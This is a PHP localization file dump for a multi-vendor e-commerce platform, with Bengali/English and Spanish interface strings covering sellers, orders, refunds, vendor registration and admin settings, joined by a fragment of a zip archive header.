'want_to_Turn_ON_Sales_Commission_For_This_Seller' => 'এই বিক্রেতার জন্য বিক্রয় কমিশন চালু করতে চান', 'want_to_Turn_OFF_Sales_Commission_For_This_Seller' => 'এই বিক্রেতার জন্য বিক্রয় কমিশন বন্ধ করতে চান', 'if_sales_commission_is_enabled_here_the_this_commission_will_be_applied' => 'বিক্রয় কমিশন এখানে এনাবল হলে এই কমিশন প্রয়োগ করা হবে', 'want_to_Turn_ON_GST_Number_For_This_Seller' => 'এই বিক্রেতার জন্য GST নম্বর চালু করতে চান', 'want_to_Turn_OFF_GST_Number_For_This_Seller' => 'এই বিক্রেতার জন্য GST নম্বর বন্ধ করতে চান', 'if_GST_number_is_enabled_here_it_will_be_show_in_invoice' => 'এখানে GST নম্বর চালু থাকলে তা চালানে দেখানো হবে', 'Seller_POS_Permission' => 'বিক্রেতার POS অনুমতি', 'if_enabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'এনাবল হলে এই বিক্রেতা ওয়েবসাইট এবং বিক্রেতা অ্যাপ থেকে POS অ্যাক্সেস করতে পারবেন', 'want_to_Turn_ON_POS_For_This_Seller' => 'এই বিক্রেতার জন্য POS চালু করতে চান', 'want_to_Turn_OFF_POS_For_This_Seller' => 'এই বিক্রেতার জন্য POS বন্ধ করতে চান', 'if_disabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'ডিসাবল হলে এই বিক্রেতা ওয়েবসাইট এবং বিক্রেতা অ্যাপ থেকে POS অ্যাক্সেস করতে পারবেন', 'GST_number_for_this_seller_has_been_updated.' => 'এই বিক্রেতার জন্য GST নম্বর আপডেট করা হয়েছে।', 'search menu' => 'সার্চ মেনু', 'category_not_found' => 'ক্যাটাগরি পাওয়া যায়নি', 'brands_not_found' => 'ব্র্যান্ড পাওয়া যায়নি', 'shop_not_found' => 'দোকান পাওয়া যায়নি', 'Want_to_Turn_ON_Customer_Reviews' => 'গ্রাহক রিভিউ চালু করতে চান', 'Want_to_Turn_OFF_Customer_Reviews' => 'গ্রাহক রিভিউ বন্ধ করতে চান', 'if_enabled_anyone_can_see_this_review_on_the_user_website_and_customer_app' => 'এনাবল হলে যে কেউ ব্যবহারকারীর ওয়েবসাইট এবং গ্রাহক অ্যাপে এই রিভিউটি দেখতে পারেন', 'if_disabled_this_review_will_be_hidden_from_the_user_website_and_customer_app' => 'ডিসাবল করা হলে এই রিভিউটি ব্যবহারকারীর ওয়েবসাইট এবং গ্রাহক অ্যাপ থেকে লুকানো হবে', 'total_sold_amount' => 'মোট বিক্রির পরিমাণ', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => '"রেডি প্রোডাক্ট" ডেলিভারির জন্য গ্রাহকরা পেমেন্ট করতে পারবেন এবং তাৎক্ষণিকভাবে প্রি-আপলোড করা ডিজিটাল পণ্য ডাউনলোড করতে পারবেন। "রেডি আফটার সেল" ডেলিভারির জন্য গ্রাহকরা প্রথমে অর্থ প্রদান করে তারপর অ্যাডমিন ডিজিটাল পণ্যগুলি আপলোড করে যা গ্রাহকদের ডাউনলোডের জন্য উপলব্ধ হয়', 'add_your_product’s_thumbnail_in' => 'আপনার পণ্যের থাম্বনেইল যোগ করুন', 'if_enabled_this_brand_will_be_available_on_the_website_and_customer_app' => 'এনাবল হলে এই ব্র্যান্ডটি ওয়েবসাইট এবং গ্রাহক অ্যাপে পাওয়া যাবে', 'if_disabled_this_brand_will_be_hidden_from_the_website_and_customer_app' => 'ডিসাবল হলে এই ব্র্যান্ডটি ওয়েবসাইট এবং গ্রাহক অ্যাপ থেকে লুকানো হবে', 'brand_Edit' => 'ব্র্যান্ড এডিট', 'brand_Update' => 'ব্র্যান্ড আপডেট', 'sub_Category_Setup' => 'সাব ক্যাটাগরি সেটআপ', 'sub_category_name' => 'সাব ক্যাটাগরির নাম', 'new_Sub_Category' => 'নতুন সাব ক্যাটাগরি', 'main_Category' => 'মুল ক্যাটাগরি', 'select_main_category' => 'প্রধান ক্যাটাগরি নির্বাচন করুন', 'search_by_Sub_Category' => 'সাব ক্যাটাগরি অনুসারে সার্চ করুন', 'sub_category_Image' => 'সাব ক্যাটাগরি ইমেজ', 'are_you_sure_to_delete_this_sub_category' => 'আপনি এই সাব ক্যাটাগরি মুছে ফেলার বিষয়ে নিশ্চিত', 'sub_Category_deleted_Successfully.' => 'সাব ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে.', 'category_updated_successfully' => 'ক্যাটাগরি সফলভাবে আপডেট করা হয়েছে৷', 'after_refunded_you_can_not_change_it' => 'রিফান্ড দেওয়ার পরে আপনি এটি পরিবর্তন করতে পারবেন না', 'you_want_to_change_refund_status' => 'আপনি রিফান্ড স্ট্যাটাস পরিবর্তন করতে চান', 'refund_status_updated_successfully' => 'রিফান্ড স্ট্যাটাস সফলভাবে আপডেট করা হয়েছে৷', 'it_is_already_refunded_you_can_not_change_it' => 'এটি ইতিমধ্যেই ফেরত দেওয়া হয়েছে আপনি এটি পরিবর্তন করতে পারবেন না', 'order_verification_images' => 'অর্ডার ভেরিফিকেশন ইমেজ', 'Withdraw_request_has_been_sent' => 'উইথড্র অনুরোধ পাঠানো হয়েছে', 'filter_Products' => 'ফিল্টার পণ্য', 'new_Request' => 'নতুন অনুরোধ', 'view_All_Hold_Orders' => 'সব হোল্ড অর্ডার দেখুন', 'add_New_Customer' => 'নতুন গ্রাহক যোগ করুন', 'clear_Cart' => 'কার্ট খালি করুন', 'new_Order' => 'নতুন অর্ডার', 'out for delivery' => 'আউট ফর ডেলিভারি', 'website_Order' => 'ওয়েবসাইট অর্ডার', 'download_the_format_file_and_fill_it_with_proper_data' => 'ফরম্যাট ফাইল ডাউনলোড করুন এবং সঠিক ডেটা দিয়ে পূরণ করুন', 'once_you_have-downloaded_and_filled_the_format_file_upload_it_in_the_form_below_and_submit.' => 'একবার আপনি ডাউনলোড করে ফর্ম্যাট ফাইলটি পূরণ করে নিচের ফর্মে আপলোড করুন এবং জমা দিন.', 'after_uploading_products_you_need_to_edit_them_and_set_products_images_and_choices.' => 'পণ্য আপলোড করার পরে আপনাকে সেগুলি সম্পাদনা করতে হবে এবং পণ্যের চিত্র এবং পছন্দগুলি সেট করতে হবে.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_images_path.' => 'আপনি গ্যালারি থেকে পণ্য ফোল্ডারে আপনার পণ্যের ছবি আপলোড করতে পারেন এবং ছবি পাথ কপি করতে পারেন.', 'import_Products_File' => 'আমদানি পণ্য ফাইল', 'download_Format' => 'ডাউনলোড ফরম্যাট', 'product_reviews' => 'পণ্য রিভিউ', 'choose_Product' => 'পণ্য নির্বাচন করুন', 'choose_Customer' => 'গ্রাহক নির্বাচন করুন', 'choose_Status' => 'স্ট্যাটাস নির্বাচন করুন', 'from_Date' => 'তারিখ থেকে', 'shop_Edit' => 'শপ এডিট', 'edit_Shop_Info' => 'শপ এডিট ইনফো', 'upload_Image' => 'ইমেজ আপলোড করুন', 'identity_type' => 'পরিচয়ের ধরন', 'driving_license' => 'ড্রাইভিং লাইসেন্স', 'company_id' => 'কোম্পানি আইডি', 'identity_number' => 'আইডেন্টিটি নম্বর', 'Deliveryman_added_successfully' => 'ডেলিভারিম্যান সফলভাবে যোগ করা হয়েছে', 'add_deliveryman' => 'ডেলিভারিম্যান যোগ করুন', 'back_to_delivery-man_list' => 'ডেলিভারি-ম্যান লিস্টে ফিরে যান', 'Delivery_Man_Account' => 'ডেলিভারি ম্যান অ্যাকাউন্ট', 'add_new_contact_information' => 'নতুন যোগাযোগের তথ্য যোগ করুন', 'ame' => 'Ame', 'You already subscribed this site!!' => 'আপনি ইতিমধ্যে এই সাইট সাবস্ক্রাইব করেছেন!!', 'flash_deal_products' => 'ফ্ল্যাশ ডিল পণ্য', 'about_our_company' => 'আমাদের কোম্পানী সম্পর্কে', 'email_is_not_configured' => 'ইমেল কনফিগার করা নেই', 'contact_with_the_administrator' => 'অ্যাডমিনিস্ট্রেটরের সাথে যোগাযোগ করুন', 'followed' => 'অনুসরণ', 'my_inbox' => 'আমার ইনবক্স', 'my_order_details_seller_info' => 'আমার অর্ডার বিবরণ বিক্রেতার তথ্য', 'my_order_details_delivery_man_info' => 'আমার অর্ডার বিবরণ ডেলিভারি ম্যান তথ্য', 'you_can_review_after_the_product_is_delivered' => 'পণ্যটি ডেলিভারির পরে আপনি রিভিউ করতে পারেন', 'you_can_refund_request_after_the_product_is_delivered' => 'পণ্য ডেলিভারির পরে আপনি রিফান্ডের অনুরোধ করতে পারেন', 'my_order_details_track_order' => 'আমার অর্ডার বিবরণ ট্র্যাক অর্ডার', 'If you require any assistance or have feedback or suggestions about our site you can email us at' => 'আপনার যদি আমাদের সাইট সম্পর্কে কোনো সহায়তার প্রয়োজন হয় বা প্রতিক্রিয়া বা পরামর্শ থাকে তবে আপনি আমাদের ইমেল করতে পারেন', 'they_register' => 'তারা রেজিস্ট্রেশন করেছে', 'with_special_offer' => 'বিশেষ অফার সহ', 'your_order_is_being_processed_and_will_be_completed_within_3_to_6 hours' => 'আপনার অর্ডার প্রসেস করা হচ্ছে এবং 3 থেকে 6 ঘন্টার মধ্যে সম্পন্ন হবে', 'hurry_Up' => 'Hurry Up', 'the_offer_is_limited' => 'The offer is limited', 'grab_while_it_lasts' => 'Grab while it lasts', 'top_sellers' => 'Top sellers', 'Your_Cart_is_Empty' => 'Your Cart is Empty', 'all_vendors' => 'সমস্ত বিক্রেতা', 'vendor_zone' => 'বিক্রেতা অঞ্চল', 'become_a_vendor' => 'একজন বিক্রেতা হয়ে উঠুন', 'vendor_login' => 'বিক্রেতা লগইন', 'please_check_the_recaptcha.' => 'Please check the recaptcha.', 'password_do_not_match' => 'Password do not match', 'password_match' => 'Password match', 'update_successfully' => 'Update successfully', 'cannot_input_minus_value' => 'Cannot input minus value', 'all_input_field_required' => 'All input field required', 'sorry_stock_limit_exceeded' => 'Sorry stock limit exceeded', 'Product_has_been_removed_from_wishlist' => 'Product has been removed from wishlist', 'Okay' => 'Okay', 'Product_added_to_wishlist' => 'Product added to wishlist', 'Please_Login' => 'Please Login', 'You_need_to_login_to_view_this_feature' => 'You need to login to view this feature', 'Delete_this_address' => 'Delete this address', 'This_address_will_be_removed_from_this_list' => 'This address will be removed from this list', 'Chat_with_us_on_WhatsApp' => 'Chat with us on WhatsApp', 'password_must_be_7+_Character' => 'Password must be 7+ Character', 'log_in' => 'Log in', 'vendor_Apply' => 'বিক্রেতা আবেদন', 'vendor_Info' => 'বিক্রেতার তথ্য', 'language_change_successfully' => 'Language change successfully', 'image_Description' => 'Image Description', 'New_Message' => 'New Message', 'file_upload' => 'File upload', 'admin_have_no_permission_for_vendors_digital_product_upload' => 'Admin have no permission for vendors digital product upload', 'location_on_Map' => 'Location on Map', 'order_confirmed' => 'Order confirmed', 'preparing_shipment' => 'Preparing shipment', 'confirm_payments_before_change_the_status' => 'Confirm payments before change the status', 'change_the_status_paid_only_when_you_received_the_payment_from_customer' => 'Change the status paid only when you received the payment from customer', '_once_you_change_the_status_to_paid' => ' once you change the status to paid', '_you_cannot_change_the_status_again' => ' you cannot change the status again', 'when_order_status_delivered_you_can`t_update_the_delivery_man_incentive' => 'When order status delivered you can`t update the delivery man incentive', 'when_payment_status_paid_then_you_can`t_change_payment_status_paid_to_unpaid' => 'When payment status paid then you can`t change payment status paid to unpaid', 'pending_Orders' => 'Pending Orders', 'image_description' => 'Image description', 'product_Attribute_Setup' => 'Product Attribute Setup', 'in-House_Products' => 'In-House Products', 'product_gallery' => 'Product gallery', 'vendor_Products' => 'Vendor Products', 'product_update_requests' => 'Product update requests', 'banner_Setup' => 'Banner Setup', 'send_notification_svg' => 'Send notification svg', 'push_notifications_setup' => 'Push notifications setup', 'push_notification_svg' => 'Push notification svg', 'vendor_Sales' => 'Vendor Sales', 'vendors' => 'Vendors', 'add_New_Vendor' => 'Add New Vendor', 'vendor_List' => 'Vendor List', 'delivery_men' => 'Delivery men', 'business_Settings' => 'Business Settings', 'in-house_Shop' => 'In-house Shop', 'login_Settings' => 'Login Settings', 'themes_&_Addons' => 'Themes & Addons', '3rd_Party' => '3rd Party', 'other_Configurations' => 'Other Configurations', 'business_Pages' => 'Business Pages', 'React_website_configuration' => 'React website configuration', 'deleted_successfully' => 'Deleted successfully', 'the_file_upload_field_is_required' => 'The file upload field is required', 'status_updated_failed' => 'Status updated failed', 'do_you_want_to_sign_out' => 'Do you want to sign out', 'do_not_Logout' => 'Do not Logout', 'want_to_change_this_language' => 'Want to change this language', 'please_enter_a_valid_integer_for_current_stock' => 'Please enter a valid integer for current stock', 'at_least_8_characters' => 'At least 8 characters', 'at_least_one_uppercase_letter_' => 'At least one uppercase letter ', 'at_least_one_number' => 'At least one number', 'at_least_one_symbol' => 'At least one symbol', 'please_check_your_inventory_and_update' => 'Please check your inventory and update', 'There_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_your_inventory' => 'Please check your inventory', 'invoice_Date' => 'Invoice Date', 'invoice_of' => 'Invoice of', 'reference_ID' => 'Reference ID', 'shipping_To' => 'Shipping To', 'item_Description' => 'Item Description', 'unit_Price' => 'Unit Price', 'total_Item_Price' => 'Total Item Price', 'sub_Total' => 'Sub Total', 'thanks_for_the_purchase' => 'Thanks for the purchase', 'We_are_sorry_server_is_not_responding' => 'We are sorry server is not responding', 'Try_after_sometime' => 'Try after sometime', 'Loading' => 'Loading', 'showing' => 'Showing', 'entries' => 'Entries', 'filtered' => 'Filtered', 'total_entries' => 'Total entries', 'no_matching_data_found' => 'No matching data found', 'vendor_Order' => 'Vendor Order', 'select_Date_Type' => 'Select Date Type', 'expense_bearer_' => 'Expense bearer ', 'billed_To' => 'Billed To', 'vendor_mail_template' => 'Vendor mail template', 'admin_mail_template' => 'Admin mail template', 'customer_mail_template' => 'Customer mail template', 'delivery_Man_mail_template' => 'Delivery Man mail template', 'registration' => 'Registration', 'get_email_on_' => 'Get email on ', 'want_to_Turn_OFF_this_mail' => 'Want to Turn OFF this mail', 'want_to_Turn_ON_this_mail' => 'Want to Turn ON this mail', 'if_disabled_users_would_not_receive_this_mail' => 'If disabled users would not receive this mail', 'if_enabled_users_will_receive_this_mail' => 'If enabled users will receive this mail', 'template_UI' => 'Template UI', 'congratulation' => 'Congratulation', 'Your_registration_request_has_been_send_to_admin_successfully' => 'Your registration request has been send to admin successfully', 'Please_wait_until_admin_reviewal' => 'Please wait until admin reviewal', 'meanwhile_click_here_to_visit_' => 'Meanwhile click here to visit ', '_website' => ' website', 'please_contact_us_for_any_queries' => 'Please contact us for any queries', '_we’re_always_happy_to_help' => ' we’re always happy to help', 'Thanks_&_Regards' => 'Thanks & Regards', 'copyright_' => 'Copyright ', 'all_right_reserved' => 'All right reserved', 'header_content' => 'Header content', 'mail_body' => 'Mail body', 'footer_content' => 'Footer content', 'section_text' => 'Section text', 'we’re_always_happy_to_help' => 'We’re always happy to help', 'page_links' => 'Page links', 'social_media_links' => 'Social media links', 'copyright_content' => 'Copyright content', 'email_template' => 'Email template', 'search_for_items' => 'Search for items', 'Please_Sign_in' => 'Please Sign in', 'You_need_to_Sign_in_to_view_this_feature' => 'You need to Sign in to view this feature', 'vendor_Login' => 'Vendor Login', 'welcome_back_to_vendor_login' => 'Welcome back to vendor login', 'your_account_has_been_suspended' => 'Your account has been suspended', 'please_contact_with' => 'Please contact with', 'help_and_support' => 'Help and support', 'your_account_is_not_approved_yet' => 'Your account is not approved yet', 'please_wait_or_contact_with' => 'Please wait or contact with', 'copied_successfully' => 'Copied successfully', 'shop_application' => 'Shop application', 'already_have_an_account' => 'Already have an account', 'congratulations' => 'Congratulations', 'your_registration_is_successful' => 'Your registration is successful', 'please-wait_for_admin_approval' => 'Please-wait for admin approval', ' you’ll_get_a_mail_soon' => ' you’ll get a mail soon', 'want_to_apply_as_a_vendor' => 'Want to apply as a vendor', 'The_first_name_field_is_required' => 'The first name field is required', 'The_last_name_field_is_required' => 'The last name field is required', 'The_phone_field_is_required' => 'The phone field is required', 'The_phone_number_has_already_been_taken' => 'The phone number has already been taken', 'please_ensure_your_phone_number_is_valid_and_does_not_exceed_20_characters' => 'Please ensure your phone number is valid and does not exceed 20 characters', 'The_email_field_is_required' => 'The email field is required', 'The_email_has_already_been_taken' => 'The email has already been taken', 'The_image_field_is_required' => 'The image field is required', 'The_image_type_must_be' => 'The image type must be', 'The_password_field_is_required' => 'The password field is required', 'The_password_and_confirm_password_must_match' => 'The password and confirm password must match', 'The_password_must_be_at_least_8_characters_long_and_contain_at_least_one_uppercase_letter' => 'The password must be at least 8 characters long and contain at least one uppercase letter', '_one_lowercase_letter' => ' one lowercase letter', '_one_digit_' => ' one digit ', '_one_special_character' => ' one special character', '_and_no_spaces' => ' and no spaces', 'The_shop_name_field_is_required' => 'The shop name field is required', 'The_shop_address_field_is_required' => 'The shop address field is required', 'The_logo_type_must_be' => 'The logo type must be', 'The_banner_type_must_be' => 'The banner type must be', 'The_bottom_banner_type_must_be' => 'The bottom banner type must be', 'Recaptcha ব্যর্থ!' => 'Recaptcha ব্যর্থ!', 'Vendor_Registration_Successfully_Completed' => 'Vendor Registration Successfully Completed', 'registration_Complete' => 'Registration Complete', 'The phone number has already been taken' => 'The phone number has already been taken', 'The email has already been taken' => 'The email has already been taken', 'registration_approved' => 'Registration approved', 'registration_denied' => 'Registration denied', 'account_suspended' => 'Account suspended', 'account_activation' => 'Account activation', 'order_received' => 'Order received', 'vendor_registration' => 'Vendor registration', 'don’t_show_again' => 'Don’t show again', 'click_to_view' => 'Click to view', 'there_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_products_in_limited_stock' => 'Please check products in limited stock', '_more_products_have_low_stock' => ' more products have low stock', 'this_product_is_low_on_stock' => 'This product is low on stock', 'once_you’ve_set_up_all_the_elements_of_your_email_template_save_and_publish_it_for_use' => 'Once you’ve set up all the elements of your email template save and publish it for use', 'vendor' => 'Vendor', 'vendor_name' => 'Vendor name', );PK ! X:�|W |W es/messages.phpnu �[��� <?php return array ( 'language_Translate' => 'idioma Traducir', 'dashboard' => 'panel', 'language' => 'idioma', 'language_content_table' => 'language content table', 'back' => 'atrás', 'SL#' => 'SL#', 'key' => 'llave', 'value' => 'valor', 'auto_translate' => 'auto traducir', 'update' => 'actualizar', 'text_updated_successfully' => 'texto actualizado con éxito', 'key_removed_successfully' => 'clave eliminada con éxito', 'key_translated_successfully' => 'clave traducida con éxito', 'settings' => 'ajustes', 'do_you_want_to_logout' => '¿quieres cerrar sesión?', 'sign_out' => 'desconectar', 'view_website' => 'ver sitioweb', 'message' => 'mensaje', 'order_list' => 'lista de orden', 'search_menu' => 'menú búsqueda', 'POS' => 'TPV', 'order_management' => 'gestión de pedidos', 'orders' => 'pedidos', 'all' => 'todo', 'pending' => 'pendiente', 'confirmed' => 'confirmado', 'packaging' => 'embalaje', 'out_for_delivery' => 'Fuera para entrega', 'delivered' => 'entregado', 'returned' => 'devuelto', 'failed' => 'fallido', 'failed_to_Deliver' => 'error de entregar', 'canceled' => 'cancelado', 'refund_Requests' => 'reembolso Solicitudes', 'approved' => 'aprobado', 'refunded' => 'reintegrado', 'rejected' => 'rechazado', 'product_management' => 'gestión producto', 'category_Setup' => 'categoría Configuración', 'categories' => 'categorías', 'sub_Categories' => 'sub Categorías', 'sub_Sub_Categories' => 'sub Sub Categorías', 'brands' => 'marcas', 'add_new' => 'añadir nuevo', 'list' => 'lista', 'product_Attributes' => 'atributos del producto', 'in-Hous_Products' => 'productos internos', 'in-house_Products' => 'productos internos', 'products' => 'productos', 'bulk_import' => 'importación masiva', 'seller_Products' => 'vendedor Productos', 'updated_products' => 'productos actualizados', 'new_Products' => 'nuevos productos', 'approved_Products' => 'productos aprobados', 'denied_Products' => 'productos denegados', 'promotion_management' => 'gestión de promociones', 'banners' => 'pancartas', 'offers_&_Deals' => 'ofertas & Ofertas', 'coupon' => 'cupón', 'flash_Deals' => 'flash ofertas', 'deal_of_the_day' => 'oferta del día', 'featured_Deal' => 'oferta destacada', 'push_Notification' => 'notificación de inserción', 'announcement' => 'anuncio', 'help_&_support_section' => 'sección ayuda y soporte', 'messages' => 'mensajes', 'support_Ticket' => 'soporte ticket', 'reports_&_Analysis' => 'informes & Análisis', 'sales_&_Transaction_Report' => 'informe de ventas y transacciones', 'Earning_Reports' => 'Informes de ganancias', 'inhouse_Sales' => 'ventas internas', 'seller_Sales' => 'vendedor Ventas', 'transaction_Report' => 'reporte de transacción', 'product_Report' => 'informe producto', 'order_Report' => 'informe orden', 'Order_Report' => 'Informe pedido', 'user_management' => 'Gestión de usuarios', 'customers' => 'clientes', 'Customer_List' => 'Lista de clientes', 'customer_List' => 'lista de clientes', 'customer_Reviews' => 'Opiniones de los usuarios', 'wallet' => 'billetera', 'loyalty_Points' => 'puntos de lealtad', 'sellers' => 'vendedores', 'add_New_Seller' => 'Agregar nuevo vendedor', 'seller_List' => 'vendedor Lista', 'withdraws' => 'se retira', 'withdrawal_Methods' => 'métodos de retiro', 'subscribers' => 'suscriptores', 'delivery-man' => 'repartidor', 'chat' => 'charlar', 'emergency_contact' => 'contacto de emergencia', 'Emergency_Contact' => 'Contacto de emergencia', 'employees' => 'empleados', 'employee_Role_Setup' => 'empleado Role Setup', 'system_Settings' => 'ajustes del sistema', 'business_Setup' => 'configuración negocio', '3rd_party' => 'Tercera parte', 'Pages_&_Media' => 'Páginas & Medios', 'pages' => 'paginas', 'social_Media_Links' => 'enlaces de redes sociales', 'gallery' => 'galería', 'system_Setup' => 'configuración del sistema', 'profile' => 'perfil', 'home' => 'hogar', 'software_version' => 'Versión del software', 'ready_to_Leave' => 'listo para salir', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'Seleccione Cerrar sesión abajo si está listo para finalizar su sesión actual', 'cancel' => 'Cancelar', 'logout' => 'cerrar sesión', 'you_have_new_order' => 'tienes nuevo orden', 'check_please' => 'Comprueba, por favor', 'ok' => 'OK', 'let_me_check' => 'permítame verificar', 'are_you_sure' => 'está seguro', 'update_option_is_disabled_for_demo' => 'la opción de actualización está deshabilitada para la demostración', 'Online_Shopping' => 'Las compras en línea', 'ecommerce' => 'comercio electrónico', 'Find_What_You_Need' => 'Encuentra lo que necesitas', 'view_all' => 'ver todo', 'Happy_Club' => 'feliz club', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'recoger cupones de tiendas y aplicar para obtener descuento especial de tiendas', 'for' => 'para', 'All_Shops' => 'Todas las tiendas', 'code' => 'código', 'Find' => 'Encontrar', 'what_you_need' => 'Que necesitas', 'top' => 'arriba', 'stores' => 'historias', 'View_All' => 'Ver todo', 'USE_COUPON' => 'USAR CUPON', 'Featured_Deals' => 'Ofertas destacadas', 'quick_view' => 'Vista rápida', 'Recommended_For_You' => 'Recomendado para ti', 'Featured_Products' => 'Productos Destacados', 'Best_Sellings' => 'Más ventas', 'Latest_Products' => 'Últimos productos', 'sorry_this_item_is_currently_sold_out' => 'lo siento este artículo está agotado actualmente', 'more_stores' => 'mas tiendas', 'closed_now' => 'cerrado ahora', 'Top_Rated_Products' => 'Productos mejor calificados', 'Don’t_Miss_the_Chance' => 'No pierdas la oportunidad', 'Today’s_Best_Deal' => 'La mejor oferta de hoy', 'save' => 'ahorrar', 'Buy_Now' => 'Comprar ahora', 'just' => 'justo', 'for_you' => 'para ti', 'Do_not_Miss_Todays_Deal' => 'No perder la oferta de hoy', 'Let_us_Shopping_Today' => 'Vamos de compras hoy', 'Shop_Now' => 'Compra ahora', 'Become_a_Seller' => 'Conviértase en vendedor', 'All_Categories' => 'Todas las categorias', 'Search_for_items_or_store' => 'Buscar artículos o tienda', 'Search_for_items' => 'Buscar elementos', 'offers' => 'ofertas', 'Discounted_Products' => 'Productos con rebajas', 'theme_mode' => 'tema modo', 'login' => 'acceso', 'register' => 'registro', 'Select_Category' => 'Selecciona una categoría', 'Home' => 'Hogar', 'Offers' => 'ofertas', 'Featured_Deal' => 'Oferta destacada', 'discounted_products' => 'productos rebajados', 'empty_Cart' => 'Carro vacio', 'light' => 'luz', 'dark' => 'oscuro', 'First_Shipping' => 'Primer envío', 'First_Shipping_all_across_the_country' => 'Primer envío a todo el país ', 'Authentic_Products' => 'Productos auténticos', '100%_Authentic_Products' => 'Productos 100% auténticos ', '100%_Secure_Payment' => 'Pago 100% seguro', 'We_Ensure_Secure_Transactions' => 'Nosotros Aseguramos Transacciones Seguras', '24/7_Support_Center' => 'Centro de soporte 24/7', 'We_Ensure_Quality_Support' => 'Aseguramos el soporte de calidad', 'Hotline' => 'línea directa', 'Accounts' => 'cuentas', 'Open_Your_Store' => 'Abre tu tienda', 'Profile' => 'Perfil', 'track_order' => 'orden de pista', 'Help_&_Support' => 'Servicio de asistencia', 'Quick_Links' => 'Enlaces rápidos', 'Top_Stores' => 'Principales tiendas', 'FAQ' => 'Preguntas más frecuentes', 'Other' => 'Otro', 'About_Company' => 'Acerca de la compañía', 'Privacy_Policy' => 'Política de privacidad', 'Terms_&_Conditions' => 'Términos y condiciones', 'refund_policy' => 'politica de reembolso', 'return_policy' => 'política de devoluciones', 'cancellation_policy' => 'política de cancelación', 'Support_Ticket' => 'Soporte Ticket', 'wishlist' => 'lista de deseos', 'Cart' => 'Carro', 'Compare' => 'Comparar', 'sign_up' => 'inscribirse', 'login_to_your_account.' => 'Ingrese a su cuenta.', 'Don’t_have_account' => 'No tengo cuenta', 'First_Name' => 'Nombre de pila', 'Ex' => 'Ej', 'Last_Name' => 'Apellido', 'email' => 'correo electrónico', 'enter_email_or_phone_number' => 'ingrese correo electrónico o número de teléfono', 'phone' => 'teléfono', 'enter_phone_number' => 'ingresa número telefónico', 'password' => 'contraseña', 'minimum_8_characters_long' => 'mínimo 8 caracteres largo', 'Confirm_Password' => 'Confirmar Contraseña', 'Enter_captcha_value' => 'Introducir valor captcha', 'i_agree_with_the' => 'estoy de acuerdo con el', 'Sign_Up' => 'Inscribirse', 'or_continue_with' => 'o continuar con', 'Customeer_Added_Successfully' => 'Cliente agregada con éxito', 'Please_check_the_recaptcha' => 'Por favor verifique el recaptcha', 'Enter_email_or_phone_number' => 'Ingrese correo electrónico o número de teléfono', 'Ex:_6+_character' => 'Ej: 6+ carácter', 'remember_me' => 'Acuérdate de mí', 'Forgot_Password' => 'Has olvidado tu contraseña', 'Enter captcha value' => 'Ingrese el valor de captcha', 'Login_successful' => 'Inicio de sesión correcto', 'Seller_Login' => 'Vendedor Iniciar sesión', 'login_to_your_seller_account.' => 'inicie sesión en su cuenta de vendedor.', 'Enter_email' => 'Ingrese correo electrónico', 'Ex:_8+_character' => 'Ej: 8+ carácter', 'Your_Privacy_Matter' => 'Tu privacidad asunta', 'no_thanks' => 'No, gracias', 'yes_i_Accept' => 'sí, acepto', 'Are_you_sure' => 'Está seguro', 'No' => 'No', 'Yes' => 'Sí', 'environment_setup' => 'configuración ambiente', 'Environment_Setup' => 'Entorno Configuración', 'Generate_Site_Map' => 'Generar mapa del sitio', 'Analytic_Script' => 'Script analítico', 'Currency_Setup' => 'Moneda Configuración', 'languages' => 'idiomas', 'Clean_Database' => 'Limpiar base de datos', 'software_update' => 'actualización de software', 'theme_setup' => 'configuración del tema', 'environment_Information' => 'medio ambiente Información', 'APP_NAME' => 'NOMBRE DE LA APLICACIÓN', 'APP_DEBUG' => 'APP DEBUG', 'true' => 'verdadero', 'false' => 'FALSO', 'APP_MODE' => 'MODO APLICACIÓN', 'live' => 'vivir', 'dev' => 'Dev', 'APP_URL' => 'APLICACIÓN URL', 'DB_CONNECTION' => 'DB CONEXIÓN', 'DB_HOST' => 'DB HOST', 'DB_PORT' => 'DB PORT', 'DB_DATABASE' => 'DB BASE DE DATOS', 'DB_USERNAME' => 'DB NOMBRE DE USUARIO', 'DB_PASSWORD' => 'DB CONTRASEÑA', 'BUYER_USERNAME' => 'COMPRADOR NOMBRE DE USUARIO', 'PURCHASE_CODE' => 'CÓDIGO DE COMPRA', 'submit' => 'entregar', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'cambiar algunas configuraciones tomará tiempo para mostrar efecto por favor borrar sesión o esperar 60 minutos otro navegar desde modo incógnito', 'language_table' => 'tabla idioma', 'add_new_language' => 'añadir nuevo idioma', 'SL' => 'SL', 'ID' => 'IDENTIFICACIÓN', 'name' => 'nombre', 'status' => 'estado', 'default_status' => 'estado predeterminado', 'action' => 'acción', 'translate' => 'traducir', 'delete' => 'borrar', 'new_language' => 'nuevo idioma', 'country_code' => 'código de país', 'direction' => 'dirección', 'close' => 'cerca', 'add' => 'agregar', 'status_updated_successfully' => 'estado actualizado con éxito', 'are_you_sure_to_delete_this' => 'estás seguro de eliminar esto', 'you_will_not_be_able_to_revert_this' => 'usted no podrá revertir esto', 'Yes_delete_it' => 'si borrarlo', 'default_language_can_not_be_deleted' => 'El idioma predeterminado no se puede eliminar', 'to_delete_change_the_default_language_first' => 'para eliminar cambiar el idioma predeterminado primero', 'already_added!' => '¡ya agregado!', 'Captcha_Failed.' => 'Código de imagen erroneo.', 'Captcha Failed' => 'Código de imagen erroneo', 'login_successful' => 'Inicio de sesión correcto', 'add_to_wishlist' => 'añadir a la lista de deseos', 'in_Stock' => 'en stock', 'please_choose_all_the_options' => 'por favor elige todas las opciones', 'Sorry_Out_of_stock' => 'Lo siento Agotado en existencias', 'quantity' => 'cantidad', 'total_price' => 'precio total', 'Tax' => 'Impuesto', 'buy_now' => 'comprar ahora', 'add_to_Cart' => 'añadir a la cesta', 'Product_Details' => 'Detalles de producto', 